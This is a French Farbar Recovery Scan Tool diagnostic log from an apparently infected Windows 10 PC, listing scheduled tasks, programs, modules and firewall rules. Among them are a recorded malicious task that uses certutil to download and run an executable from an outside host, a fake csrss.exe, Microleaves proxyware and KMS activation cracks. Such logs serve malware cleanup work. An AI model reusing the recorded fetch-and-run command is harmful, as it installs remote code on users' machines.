Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 4.02.2019
Exécuté par yassine (04-02-2019 19:04:11)
Exécuté depuis C:\Users\yassine\Documents
Windows 10 Pro Version 1809 17763.253 (X64) (2018-12-05 18:42:23)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-1848641037-2696689444-97599420-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1848641037-2696689444-97599420-503 - Limited - Disabled)
Invité (S-1-5-21-1848641037-2696689444-97599420-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1848641037-2696689444-97599420-504 - Limited - Disabled)
yassine (S-1-5-21-1848641037-2696689444-97599420-1001 - Administrator - Enabled) => C:\Users\yassine
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Autodesk Fusion 360 (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.5103 - Autodesk, Inc.)
CodeBlocks (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\CodeBlocks) (Version: 17.12 - The Code::Blocks Team)
Dassault Systemes Software B20 (HKLM\...\Dassault Systemes B20_0) (Version: - )
Dassault Systemes Software Prerequisites x86-x64 (HKLM\...\{CF1EB598-B424-436A-B15F-B763846BA970}) (Version: 8.1.3 - Dassault Systemes)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
MATLAB R2018a (HKLM\...\Matlab R2018a) (Version: 9.4 - MathWorks)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\OneDriveSetup.exe) (Version: 18.240.1202.0004 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 65.0 (x64 fr) (HKLM\...\Mozilla Firefox 65.0 (x64 fr)) (Version: 65.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 63.0.3 - Mozilla)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.7.0 - Microleaves) Hidden <==== ATTENTION
Proteus 8 Professional (HKLM-x32\...\{A686E9C2-C318-4FA0-BAC2-D6FDA2E1B556}) (Version: 8.1.17358.0 - Labcenter Electronics)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-1848641037-2696689444-97599420-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1848641037-2696689444-97599420-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\yassine\AppData\Local\Autodesk\webdeploy\production\9ab85d23c78fa67a064eed38018e8b8f60a8f219\NPreview10.dll (Autodesk, Inc. -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2015-07-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0670B5D0-08E8-40D4-B987-6FD70256FBB8} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-11] (Google Inc -> Google Inc.)
Task: {1000EAEA-13F9-4D28-9E38-A31294ED73D6} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2019-01-23] ()
Task: {10559CF6-1747-489A-9539-71845EEE9486} - System32\Tasks\Opera scheduled Autoupdate 1546272161 => C:\Users\yassine\AppData\Local\Programs\Opera\launcher.exe
Task: {12B57700-BE0F-4089-8A67-9A3C50438388} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {202BE625-0740-44B2-BD30-84A98E5B297D} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2019-01-23] (AVG Technologies USA, Inc. -> AVG Technologies CZ, s.r.o.)
Task: {33499D1C-41BE-4A7E-A01E-91E09DFABAF2} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {3455A150-928E-4E1D-BF3D-CBB63FE0438D} - System32\Tasks\AutoRearm => C:\Windows\AutoRearm\AutoRearm.exe [2019-01-23] ()
Task: {3FA299A2-C514-46C9-96ED-1C8CBD536033} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {42DB81F6-14FF-41F4-9F82-5CE9DF6DCD0E} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-23] () <==== ATTENTION
Task: {458541EB-F763-4A75-A52A-9822CC7EE8D2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-19] (AVAST Software s.r.o. -> AVAST Software)
Task: {5F23D47A-7399-411B-A771-097B7CBBE893} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {6291BFE9-F2AD-4A7C-B4BE-1BE93394156F} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {683CE07F-C3E2-45CB-A461-F1F5D1E90E3F} - System32\Tasks\Opera scheduled assistant Autoupdate 1546272165 => C:\Users\yassine\AppData\Local\Programs\Opera\launcher.exe
Task: {6CFEFB12-9853-46AE-94A2-45E69FE41161} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {76A90BCB-DF31-4355-A682-9492E58412E4} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\yassine\AppData\Roaming\Microsoft\Windows\shefjrgc\wieatttg.exe [2018-09-15] ()
Task: {7CF8080C-7544-4CDE-8D4F-7C9ADA9218D3} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-11-02] (MICROLEAVES LTD -> Microleaves) <==== ATTENTION
Task: {81F507F5-0DF8-4A90-9800-07D21E7506B2} - System32\Tasks\Time Trigger Task => C:\Users\yassine\AppData\Local\4db6a491-c473-4d68-bbbe-621a79d406bf\E81.tmp.exe [2019-02-03] ()
Task: {8F6327CC-912D-4C46-9924-CBBE7C00CCB4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {99FFD275-313B-45C8-A8F1-80F165EE3E29} - System32\Tasks\I-9-1-66-1041700351-1193898365-1395117793-5203\{VHO4HVDT-642T-21BT-MGY2-DFPTVFPK2LN} => C:\Users\yassine\AppData\Roaming\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.17763.253_pt-pt_296d5f41fcf8282b\embeddedmodesvcapi.exe
Task: {A42E486A-B2D3-4A06-B9E9-9B531ABD8A3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-11] (Google Inc -> Google Inc.)
Task: {A5044050-3F43-4DCF-A24A-12B5CDB84A59} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {AA61CC88-15AB-4F69-BD7C-41CA24CED994} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor)
Task: {ABE47F29-6F18-411E-AA54-D054DE264FAE} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {AEB2E3E1-1597-4658-BCF0-51E06333C105} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor)
Task: {E39F8E32-F4B6-44B2-B8AF-D84A6CFEB7B8} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-09-15] (Microsoft Windows -> )
Task: {EAC18E13-6BE9-4822-9CF0-876DD3A21C70} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://andreysharanov.info/app/app.exe C:\Users\yassine\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\yassine\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {F1DAFAAD-B7E8-45C6-9876-484B31485CE3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
==================== Raccourcis & WMI ========================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
==================== Modules chargés (Avec liste blanche) ==============
2019-02-03 15:35 - 2019-02-03 15:35 - 001435136 ____H () C:\Windows\windefender.exe
2018-09-15 08:28 - 2018-09-15 08:28 - 000834088 _____ () C:\Windows\SYSTEM32\inputhost.dll
2018-12-13 09:54 - 2018-12-13 10:05 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-09-15 17:40 - 2018-09-15 17:40 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2018-12-13 09:54 - 2018-12-13 09:55 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ChakraBridge.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 005172224 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\YourPhone.exe
2019-01-11 15:44 - 2019-01-11 15:44 - 002172928 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\YourPhone.AppCore.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 001795584 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\PhoneContentDataStore.dll
2018-12-05 22:40 - 2018-12-05 22:41 - 001004032 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 002907136 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\PhoneCommunicationAppService.dll
2018-12-05 22:15 - 2018-12-05 22:24 - 000194048 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\WinStore.Preview.dll
2018-12-05 22:15 - 2018-12-05 22:17 - 002538056 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-12-05 22:15 - 2018-12-05 22:17 - 001754112 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.dll
2019-02-03 16:45 - 2019-02-03 16:45 - 003010048 _____ () C:\Users\yassine\AppData\Local\Temp\wup\wup.exe
2019-02-03 15:42 - 2019-02-03 15:42 - 000328704 _____ () C:\Users\yassine\AppData\Local\4db6a491-c473-4d68-bbbe-621a79d406bf\E81.tmp.exe
2017-11-02 11:51 - 2017-11-02 11:51 - 000199864 _____ () C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
2019-01-23 21:31 - 2019-01-23 21:31 - 004527616 _____ () C:\Windows\rss\csrss.exe
2019-01-06 14:14 - 2019-01-06 14:17 - 000478720 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2019-01-06 14:14 - 2019-01-06 14:17 - 065905152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-12-05 22:32 - 2018-12-06 00:54 - 003715072 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 000010752 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2018-12-05 22:32 - 2018-12-06 01:06 - 000036352 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll
2018-12-05 22:32 - 2018-12-06 01:03 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll
2018-12-05 22:32 - 2018-12-06 01:03 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\opencv_core320.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 014190080 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2018-12-05 22:32 - 2018-12-06 00:52 - 003569152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2019-01-06 14:14 - 2019-01-06 14:16 - 002871296 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2018-09-15 17:42 - 2018-09-15 17:42 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 000146432 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\SKU.dll
2018-09-15 08:28 - 2018-09-15 08:28 - 000474624 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-13 10:37 - 2018-12-13 10:37 - 002801152 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-09-15 08:28 - 2018-09-15 08:28 - 001740288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
AlternateDataStreams: C:\Users\yassine:.repos [6509722]
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
IE trusted site: HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts contenu: ===============================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2018-09-15 08:31 - 2019-01-23 21:28 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
2019-01-07 18:31 - 2019-01-07 18:31 - 000000516 _____ C:\Windows\system32\drivers\etc\hosts.ics
192.168.137.1 DESKTOP-6CA5L0V.mshome.net # 2024 1 6 6 17 31 11 291
192.168.137.172 Galaxy-J5-pro-2017.mshome.net # 2019 1 1 14 17 31 11 291
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-1848641037-2696689444-97599420-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\yassine\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\774228.jpg
DNS Servers: Le média n'est pas connecté à internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [{5DAE91DF-B96F-4ACC-BBA8-13E236F9F9D7}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\PDS.EXE ()
FirewallRules: [{6F375AD5-7CD5-4D78-A8C0-21B6E7E17E9B}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\PDS.EXE ()
FirewallRules: [{5FA53375-9962-4C3D-A692-AD995DA42F8F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD0F659D-1BDE-4806-AD4E-B9046F8BA160}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{BCEA56EB-3FC9-423A-8393-91EA3B79B688}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\\PDS.EXE ()
FirewallRules: [{EE422DA2-8285-4ACF-854E-118F320B13EF}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\\PDS.EXE ()
FirewallRules: [TCP Query User{EEE5C719-A918-46A2-8173-895BB6A949BE}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe ()
FirewallRules: [UDP Query User{A98A6D55-785A-4DBA-98E8-192B5393824E}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe ()
FirewallRules: [TCP Query User{1147C930-17C3-4F20-BB67-6F35B05EA7E9}C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe] => (Allow) C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{72F8C239-A040-4DED-8595-D5B8AB56FCD4}C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe] => (Allow) C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [TCP Query User{ED7214C9-1885-4FA2-BB35-11E96440D99B}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe (Dassault Systemes)
FirewallRules: [UDP Query User{47B5A2E7-EFBD-4770-9494-3B4B2FDDE0CA}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe (Dassault Systemes)
FirewallRules: [{7CE3247F-7293-4CB8-84B1-9E604F0A346A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc -> Google Inc.)
FirewallRules: [{ACEF1950-DF65-4ABB-98F0-E4C500D8EB61}] => (Allow) C:\Users\yassine\AppData\Local\Programs\Opera\57.0.3098.106\opera.exe Pas de fichier
FirewallRules: [TCP Query User{4BF89AA7-8436-4D11-B6B5-9A5BFACF9CCF}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [UDP Query User{48B26B9C-FB9C-47BC-8ED6-BD1484CFC449}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1DFFFDD1-8639-46A5-8C71-76236EA5C28D}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier
FirewallRules: [{ADE937A0-7000-4793-A829-175D38914245}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier
FirewallRules: [{699C9CDD-4422-4EBC-B4B6-B5D0FE4A1338}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{34A002D8-230B-4728-9A2A-5B387B824B6E}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{61D45922-9241-4669-989B-7BF83455FBB6}] => (Allow) C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{7FB731D3-2894-4265-8DD3-ACD9D43F6B14}] => (Allow) C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [TCP Query User{2B8F852E-AB35-4C68-9D97-D36A63BFE6F5}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{97661453-1CE3-4052-B74B-A7915B396643}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [TCP Query User{252C3920-0514-4173-AF82-F6F9866885B9}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{9AA6BDF4-D934-42F6-85E3-47B847E9647C}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
==================== Points de restauration =========================
19-01-2019 21:19:17 Point de contrôle planifié
29-01-2019 01:57:12 Point de contrôle planifié
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (02/04/2019 06:58:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme svchost.exe version 10.0.17763.1 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : 97c
Heure de début : 01d4bbcee36f79fa
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Windows\System32\svchost.exe
ID de rapport : fde4b0f3-d9e0-4bd2-a401-21b68c582971
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
